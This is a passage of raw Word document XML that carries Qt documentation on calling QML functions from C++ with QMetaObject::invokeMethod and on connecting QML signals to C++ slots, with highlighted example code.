                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Got message:"</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msg</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rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"some return value"</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidTr="00064AC7">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CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>C++</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937" w:type="dxa"/>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com"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>// main.cpp</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QQmlEngine</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> engine</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QQmlComponent</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> component</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>engine</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"MyItem.qml"</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QObject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object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component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create</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QVariant</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> returnedValue</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QVariant</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> msg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"Hello from C++"</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QMetaObject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invokeMethod</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object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"myQmlFunction"</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Q_RETURN_ARG</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QVariant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returnedValue</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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        Q_ARG</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QVariant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msg</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490E7E"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hyperlink r:id="rId2936" w:anchor="qDebug" w:history="1">
              <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
                <w:rPr>
                  <w:rStyle w:val="pln"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="FFFFFF"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qDebug</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</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pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;&lt;</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str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"QML function returned:"</w:t>
            </w:r>
            <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;&lt;</w:t>
            </w:r>
            <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> returnedValue</w:t>
            </w:r>
            <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>toString</w:t>
            </w:r>
            <w:r w:rsidR="00CA76F2"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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>object</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Notice the</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2937" w:anchor="Q_RETURN_ARG" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_RETURN_ARG</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() and</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2938" w:anchor="Q_ARG" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_ARG</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2939" w:anchor="invokeMethod" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QMetaObject::invokeMethod</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be specified as</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2940" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QVariant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types, as this is the generic data type used for QML method parameters and return values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2645" w:name="connecting-to-qml-signals"/>
      <w:bookmarkStart w:id="2646" w:name="_Toc483001109"/>
      <w:bookmarkStart w:id="2647" w:name="_Toc483004078"/>
      <w:bookmarkStart w:id="2648" w:name="_Toc483604442"/>
      <w:bookmarkStart w:id="2649" w:name="_Toc483605662"/>
      <w:bookmarkEnd w:id="2645"/>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connecting to QML Signals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2646"/>
      <w:bookmarkEnd w:id="2647"/>
      <w:bookmarkEnd w:id="2648"/>
      <w:bookmarkEnd w:id="2649"/>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064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All QML signals are automatically available to C++,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be connected to using</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2941" w:anchor="connect" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::connect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() like any ordinary Qt C++ signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In return, any C++ signal can be received by a QML object using</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2942" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signal handlers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here is</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a QML component with a signal named</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qmlSignal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that is emitted with a string-type parameter. This signal is connected to a C++ object's slot using</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2943" w:anchor="connect" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::connect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), so that the</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cppSlot()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method is called whenever the</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlSignal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is emitted:</w:t>
      </w:r>
